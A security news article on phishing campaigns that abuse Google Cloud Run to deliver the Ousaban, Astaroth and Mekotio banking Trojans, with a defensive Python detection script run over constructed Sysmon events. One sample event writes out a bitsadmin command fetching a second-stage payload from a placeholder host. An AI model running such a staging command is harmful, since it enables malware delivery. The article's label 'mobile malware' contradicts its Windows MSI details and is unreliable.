
Ousaban Banking Trojan

Security experts caution that hackers are exploiting the Google Cloud Run service to disseminate large quantities of banking Trojans. Cybercriminals are utilizing various mobile malware threats, such as Ousaban, along with other banking Trojans like Astaroth and Mekotio.

Google Cloud Run lets users deploy frontend and backend services, websites, or applications and run those workloads without managing or scaling infrastructure themselves. Abuse of the service for malware distribution was first observed in September 2023, when Brazilian actors began campaigns that used MSI installer files to deploy malware payloads.

Cybercriminals Exploit Phishing Tactics to Deliver Banking Trojan Threats

The attacks begin with phishing emails sent to potential victims, crafted to mimic genuine communications about invoices, financial statements, or messages purportedly from local government and tax agencies. The researchers note that most emails in this campaign are in Spanish and target countries in Latin America, although some are in Italian. These deceptive emails contain links that redirect users to malicious web services hosted on Google Cloud Run.

In some cases the payload is delivered directly as an MSI file; in others, the Cloud Run service returns a 302 redirect to a Google Cloud Storage location holding a ZIP archive that contains a malicious MSI file. When victims run the malicious MSI, additional components and payloads are downloaded and executed on their systems. In observed cases, the second-stage payload is fetched using the legitimate Windows tool 'BITSAdmin.'

To persist across reboots, the malware adds an LNK file ('sysupdates.setup.lnk') to the victim's Startup folder. The LNK file is configured to execute a PowerShell command that, in turn, runs the infection script ('AutoIT').
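The staging and persistence behaviour described above leaves a recognisable footprint in endpoint telemetry. As an added illustration, not code from the original article or from the researchers it cites, the Python script below runs two detection rules over constructed Sysmon-style JSON events: a BITSAdmin transfer spawned by an installer, and an LNK file written into a Startup folder. The user paths, hostname and job name in the sample events are placeholders.

```python
import json

# Constructed, Sysmon-style JSON events (not real telemetry) modelling the chain
# described above: msiexec launching bitsadmin to fetch a second stage, then an
# LNK dropped into the per-user Startup folder. Paths and host are placeholders.
SAMPLE_EVENTS = r"""
{"EventID":1,"Image":"C:\\Windows\\System32\\msiexec.exe","ParentImage":"C:\\Windows\\explorer.exe","CommandLine":"msiexec /i C:\\Users\\u\\Downloads\\invoice.msi"}
{"EventID":1,"Image":"C:\\Windows\\System32\\bitsadmin.exe","ParentImage":"C:\\Windows\\System32\\msiexec.exe","CommandLine":"bitsadmin /transfer j /download http://stage2.example.invalid/p.zip C:\\Users\\u\\AppData\\Local\\Temp\\p.zip"}
{"EventID":11,"Image":"C:\\Windows\\System32\\msiexec.exe","TargetFilename":"C:\\Users\\u\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\sysupdates.setup.lnk"}
{"EventID":11,"Image":"C:\\Program Files\\Vendor\\setup.exe","TargetFilename":"C:\\Users\\u\\Desktop\\Vendor.lnk"}
{"EventID":1,"Image":"C:\\Windows\\System32\\notepad.exe","ParentImage":"C:\\Windows\\explorer.exe","CommandLine":"notepad.exe"}
"""

# Both the per-user and the all-users Startup folders end with this path suffix.
STARTUP_SUFFIX = "\\start menu\\programs\\startup\\"


def parse_events(text):
    """Parse one JSON event per line, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def basename(path):
    """Lower-cased file name component of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return alerts for the two behaviours described in the article:
    a BITSAdmin download (EventID 1, process creation) and an LNK file
    written into a Startup folder (EventID 11, file creation)."""
    alerts = []
    for ev in events:
        if ev.get("EventID") == 1:
            cmd = ev.get("CommandLine", "").lower()
            parent = basename(ev.get("ParentImage", ""))
            if basename(ev.get("Image", "")) == "bitsadmin.exe" and "/transfer" in cmd and "http" in cmd:
                # bitsadmin spawned by an installer matches the staging pattern seen here
                sev = "high" if parent == "msiexec.exe" else "medium"
                alerts.append({"rule": "bitsadmin_download", "severity": sev, "parent": parent, "cmd": cmd})
        elif ev.get("EventID") == 11:
            target = ev.get("TargetFilename", "")
            if target.lower().endswith(".lnk") and STARTUP_SUFFIX in target.lower():
                alerts.append({"rule": "startup_lnk", "severity": "high", "parent": basename(ev.get("Image", "")), "path": target})
    return alerts


if __name__ == "__main__":
    for a in detect(parse_events(SAMPLE_EVENTS)):
        print(a["severity"].upper(), a["rule"], a.get("path") or a.get("cmd"))
```

The Desktop shortcut and the notepad launch in the sample are included as benign events to show that neither rule fires on ordinary LNK creation or process starts.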

Compromised Devices Are Infected with Mobile Malware Targeting Victims' Financial Data

The campaigns exploiting the Google Cloud Run feature three banking Trojans: Ousaban, Astaroth and Mekotio. Each Trojan is crafted to stealthily infiltrate systems, establish persistence, and illicitly obtain sensitive financial data for unauthorized access to banking accounts.

Ousaban, a banking Trojan, possesses capabilities such as keylogging, capturing screenshots, and phishing for banking credentials through counterfeit (cloned) banking portals. Researchers observe that Ousaban is introduced at a later stage in the Astaroth infection chain, suggesting a potential collaboration between the operators of the two malware families or the involvement of a single threat actor overseeing both.

Astaroth employs advanced evasion techniques and initially focuses on Brazilian targets but has expanded its scope to over 300 financial institutions across 15 countries in Latin America. Recently, the malware has begun collecting credentials for cryptocurrency exchange services. Utilizing keylogging, screen capture, and clipboard monitoring, Astaroth not only pilfers sensitive data but also intercepts and manipulates internet traffic to capture banking credentials.

Mekotio, active for several years, concentrates on the Latin American region. Known for pilfering banking credentials and personal information and executing fraudulent transactions, Mekotio can manipulate web browsers to redirect users to phishing sites.
